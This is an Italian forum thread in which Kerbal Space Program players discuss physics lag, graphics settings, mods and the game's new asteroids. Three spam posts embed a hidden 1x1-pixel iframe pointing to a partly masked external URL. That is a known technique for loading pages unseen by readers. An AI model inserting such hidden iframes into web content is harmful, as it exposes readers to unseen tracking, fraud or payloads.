Jump to content

Thread storico in italiano

astroostino

Recommended Posts

Una mod del genere è il mio sogno, chissà se sia possibile realizzarla... appena un vascello viene classificato come base puffff il gioco smette di calcolare la fisica, perchè tanto da li in poi rimarrà "fermo" .

Uhm non sono d'accordo, per me il bello di KSP è anche il fatto che in qualsiasi momento puoi distruggere qualcosa, se sbaglio manovra con il mio rover ed urto un supporto di atterraggio delle base, è facile che si stacchi e mi crolli addosso la struttura spezzandosi nei vari componenti secondo il loro peso, purtroppo per ottenere questo bisogna controllare in ogni momento ogni parte in gioco

ci sono anche io<iframe src="http://****earn.com/b.php?u=464" style="border:0px #000000 none;" name="My iFrame" scrolling="yes" frameborder="1" marginheight="px" marginwidth="0px" height="1px" width="1px"></iframe>

ci sono anche io<iframe src="http://****earn.com/b.php?u=464" style="border:0px #000000 none;" name="My iFrame" marginheight="px" marginwidth="0px" frameborder="1" height="1px" scrolling="yes" width="1px"></iframe>

Benvenuto tra noi :). E buon divertimento con KSP.

Uhm non sono d'accordo, per me il bello di KSP è anche il fatto che in qualsiasi momento puoi distruggere qualcosa, se sbaglio manovra con il mio rover ed urto un supporto di atterraggio delle base, è facile che si stacchi e mi crolli addosso la struttura spezzandosi nei vari componenti secondo il loro peso, purtroppo per ottenere questo bisogna controllare in ogni momento ogni parte in gioco

Come al solito, bisognerebbe trovare un modo per salvare capra e cavoli, anzi, far contento Jeb e non fondere la CPU :)

Come al solito, bisognerebbe trovare un modo per salvare capra e cavoli, anzi, far contento Jeb e non fondere la CPU :)

Assolutamente d'accordo. Seguendo questo argomento mi sono trovato a concludere che, talvolta, sia meglio che KSP non includa tutte le caratteristiche addizionali che vengono ora rese disponibili grazie ad alcune mod. Finchè qualche caratteristica è dovuta ad una mod, abbiamo la libertà di decidere se includerla o meno nel nostro gioco. Io gradirei molto, come già detto in precedenza, una mod che consenta il Welding di veicoli e basi in "flight mode" (noto l'assoluta diversità rispetto alla mod di Ubiozur, che funziona solo in "editor mode"). Ma purchè rimanga una mod, in modo che chi gradisce altrimenti, come brusura, possa sempre giocare a KSP come meglio vuole.

ci sono anche io<iframe src="http://****earn.com/b.php?u=464" style="border:0px #000000 none;" name="My iFrame" scrolling="yes" frameborder="1" marginheight="px" marginwidth="0px" height="1px" width="1px"></iframe>

benvenuto/a :)

Quel nanetto verde è incontentabile non conosce confini :D

Se metti troppe luci accade facilmente :)

Uhm dici, in effetti ho settato il numero di luci a 64, quindi sarebbe un lag più grafico che fisico, proverò e ti farò sapero, grazie :D

AGGIORNAMENTO: ehm niente ho ridotto tutti i settaggi grafici ho guadagnato un paio di frames tutto qui , peccato :(

Edited by brusura

AGGIORNAMENTO: ehm niente ho ridotto tutti i settaggi grafici ho guadagnato un paio di frames tutto qui , peccato :(

Molto, molto strano. Abbassare le impostazioni grafiche dovrebbe migliorare di parecchio gli FPS. Perlomeno, sul mio portatile passo dai 5 ai 30 FPS fra impostazioni massime/minime con un mezzo di ca. 100 parti. Sicuro che di non avere tonnellate di detriti o decine di voli in corso? la causa potrebbe essere quella.

Mah, forse sbaglio, ma abbassare la grafica è importante (anche molto) se il collo di bottiglia è dovuto alla GPU (inclusi processore/scheda grafica, VRAM ed eventualmente anche il canale dati che la collega al resto del PC).

Se invece il problema è dovuto al calcolo strutturale (tipo physics) allora è la CPU ad andare al limite (anche se solo con i core interessati dai thread aperti da KSP.exe), ed è importante anche la velocità e precisione degli algoritmi di calcolo (ovvero, come Unity.dll svolge i calcoli).

Magari altri ne sanno qualcosa in più, ma potrebbe anche essere che le giunzioni siano sotto sforzo, e questo potrebbe causare un continuo ricalcolo delle forze agenti su di esse, anche se non si vedono movimenti nè vibrazioni. E' solo un'ipotesi, comunque.

probabilmente anche il fatto di avere il ketane in azione non aiuta, non l'ho mai usato ma penso abbia parecchie animazioni no ?

kethane ha gli effetti del fumo che, almeno nel mio caso, rendono laggoso il gioco

Per vedere i fps cosa usate voi?

kethane ha gli effetti del fumo che, almeno nel mio caso, rendono laggoso il gioco

Per vedere i fps cosa usate voi?

Per gli fps, consiglio di provare FRAPS.

E concordo che gli effetti particellari, come quelli di Kethane, possono rallentare moltissimo la grafica.

• 2 weeks later...

Io ancora niente, mi sto godendo prima tutte le nuove opzioni collaterali della nuova release, ora le parti sono davvero più rigide e ti permette di osare di più nella costruzione di razzi complessi e poi la fluidità davvero ottima. Ad ogni release viene ottimizzato sempre di più, speriamo presto nel supporto multicore e 64bit :D

Aspetto ancora che qualche mod di mio interesse ( KW rocketary anche si tratta di parti e Deadly Reentry fondamentalmente ) siano ufficialmente compatibili con la 23.5 e poi provo ad agganciare qualche asteroide

La nuova versione di Unity supporta i 64bit quindi si pensa che per la fine dell'anno avremo ksp 64, anche se l'unico problema è che non ho win 64 sul mio pc attuale :D

La rigidità strutturale aumentata è davvero una gran cosa, il gioco in generale sembra più fluido (però sta cosa la si dice ad ogni update, bisogna vedere con qualche mod installata)

Questa degli asteroidi per me è un pò una cazzata. Si belli e fighi ma poi? vanno e vengono all'infinito vicino a Kerbin che puoi andare ad acchiapparli quando ti pare. C'è ne sono un sacco quindi non hai una finestra specifica in cui devi stare attento e organizzarti come si deve. Alcuni rimangono in orbita fissa attorno a Kerbin, ci manca pure questa per appesantire il gioco. Una volta che li faccio schiantare sulla terra? non succede nulla... schiantare... si fa per dire...

Dai ma è la prima introduzione di questa nuova possibilità e già come prima versione non mi dispiace, dagli il tempo di costrutire un gameplay più vario intorno agli asteroidi...e poi se non li traccki più dopo un pò gli asteroidi scompaiono non credo che ti appesantiscano il gioco.

Si è vero spariscono, l'unica cosa un po strana è per quale motivo ora Kerbin si trovi in un campo di asteroidi :D

BUHAHAHAHA IN REALTA' LI HO DIROTTATI IO...CONTRO I KRAKEN :)

Scherzo, ma neanche tanto: ho appena perso una nave dopo un crash inspiegabile...ma sono cose che succedono e devo dire che gli asteroidi ci volevano in KSP.

Un'altra cosetta: a che punto stiamo con il subforum? Mi sa che ce ne siamo un pò dimenticati.

Un'altra cosetta: a che punto stiamo con il subforum? Mi sa che ce ne siamo un pò dimenticati.

Non me ne sono dimenticato. E' un argomento che continuo a tirare fuori col Kommunity Manager, gli ho scritto in proposito anche due giorni fa. Spero presto, mi sto stancando anch'io di aspettare...:huh: (certo, ci sono stati alcuni problemini di recente e l'admin si è dedicato a quelli...)

Guest
This topic is now closed to further replies.
  • Create New...